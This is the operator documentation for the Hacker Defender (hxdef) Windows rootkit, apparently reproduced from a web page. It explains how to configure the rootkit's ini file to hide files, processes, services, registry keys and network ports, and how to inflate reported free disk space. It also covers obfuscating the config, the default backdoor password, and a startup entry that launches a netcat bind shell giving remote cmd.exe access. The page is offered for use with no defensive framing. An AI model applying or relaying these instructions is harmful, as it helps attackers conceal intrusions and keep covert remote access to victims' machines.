|You are here:|
- only install service, but not run
- use to update settings from inifile
- doesn't install services and run normally
- removes hxdef from the memory and kills all running backdoor connections stopping hxdef service does the same now
The ini file
Sections and special characters
The ini file is composed of following sections:
- Hidden Table
- Root Processes
- Hidden Services
- Hidden RegKeys
- Hidden RegValues
- Startup Run
- Free Space
- Hidden Ports
Following extra characters can be added to ini file (under certain conditions) to obfuscate the file:
[H<<<idden T>>a/"ble] >h"xdef"*
is the same as
[Hidden Table] hxdef*
List of files, directories and processes which should be hidden. All files and directories in this list will disappear from file managers. Programs in this list will be hidden in tasklist. Make sure main file, inifile, your backdoor file and driver file are mentioned in this list.
List of programs which will be immune against infection. You can see hidden files, directories and programs only with these root programs. So, root processes are for rootkit admins. To be mentioned in Root Processes doesn't mean you're hidden. It is possible to have root process which is not hidden and vice versa.
List of service and driver names which will be hidden in the database of installed services and drivers. Service name for the main rootkit program is HackerDefender100 as default, driver name for the main rootkit driver is HackerDefenderDrv100. Both can be changed in the inifile.
List of registry keys which will be hidden. Rootkit has four keys in registry:
If you rename service name or driver name you should also change this list.
First two registry keys for service and driver are the same as its name. Next two are LEGACY_NAME. For example if you change your service name to BoomThisIsMySvc your registry entry will be LEGACY_BOOMTHISISMYSVC.
List of registry values which will be hidden.
List of programs which rootkit runs after its startup. These programs will have same rights as rootkit. Program name is divided from its arguments with question tag. Do not use " characters. Programs will terminate after user logon. Use common and well known methods for starting programs after user logon. You can use following shortcuts here:
|%cmd%||stands for system shell exacutable + path (e.g. C:\winnt\system32\cmd.exe)|
|%cmddir%||stands for system shell executable directory (e.g. C:\winnt\system32\)|
|%sysdir%||stands for system directory (e.g. C:\winnt\system32\)|
|%windir%||stands for Windows directory (e.g. C:\winnt\)|
|%tmpdir%||stands for temporary directory (e.g. C:\winnt\temp\)|
c:\sys\nc.exe?-L -p 100 -t -e cmd.exe
netcat-shell is run after rootkit startup and listens on port 100
%cmd%?/c echo Rootkit started at %TIME%>> %tmpdir%starttime.txt
This will put a time stamp to temporary_directory\starttime.txt (e.g. C:\winnt\temp\starttime.txt) everytime rootkit starts (%TIME% works only with Windows 2000 and higher)
List of harddrives and a number of bytes you want to add to a free space. The list item format is X:NUM where X stands for the drive letter and <tt<NUM is the number of bytes that will be added to its number of free bytes.
this will add about 123 MB more to shown free disk space of disk C
List of open ports that you want to hide from applications like OpPorts, FPort, Active Ports, Tcp View etc. It has at most 2 lines:
- First line format is TCP:tppport1,tcpport2,tcpport3 ...
- Second line format is UDP:udpport1,udpport2,udpport3 ...
this will hide two ports: 8080/TCP and 456/TCP
This will hide two ports: 8001/TCP and 12345/UDP
This will hide five ports: 53/UDP, 54/UDP, 55/UDP, 56/UDP and 800/UDP
Contains eigth values:
- Password which is 16 character string used when working with backdoor or redirector. Password can be shorter, rest is filled with spaces.
- Name for file copy of the system shell which is created by backdoor in temporary directory.
- Name of shared memory where the settings for hooked processes are stored.
- Name of rootkit service
- Display name for rootkit service
- Description for rootkit service
- Name for hxdef driver
- Name for hxdef driver file.
|Password=hxdef-rulez||your backdoor password is "hxdef-rulez"|
|BackdoorShell=hxdefá$.exe||backdoor will copy system shell file (usually cmd.exe) to "hxdefá$.exe" to temp|
|FileMappingName=_.-=[Hacker Defender]=-._||Name of shared memory will be "_.-=[Hacker Defender]=-._"|
|ServiceName=HackerDefender100||Name of a service is "HackerDefender100"|
|ServiceDisplayName=HXD Service 100||its display name is "HXD Service 100"|
|ServiceDescription=powerful NT rootkit||its description is "poweful NT rootkit"|
|DriverName=HackerDefenderDrv100||Name of a driver is "HackerDefenderDrv100"|
|DriverFileName=hxdefdrv.sys||Driver will be stored in a file called "hxdefdrv.sys"|
Default ini file
[Hidden Table] hxdef* rcmd.exe [Root Processes] hxdef* rcmd.exe [Hidden Services] HackerDefender* [Hidden RegKeys] HackerDefender100 LEGACY_HACKERDEFENDER100 HackerDefenderDrv100 LEGACY_HACKERDEFENDERDRV100 [Hidden RegValues] [Startup Run] [Free Space] [Hidden Ports] [Settings] Password=hxdef-rulez BackdoorShell=hxdefß$.exe FileMappingName=_.-=[Hacker Defender]=-._ ServiceName=HackerDefender100 ServiceDisplayName=HXD Service 100 ServiceDescription=powerful NT rootkit DriverName=HackerDefenderDrv100 DriverFileName=hxdefdrv.sys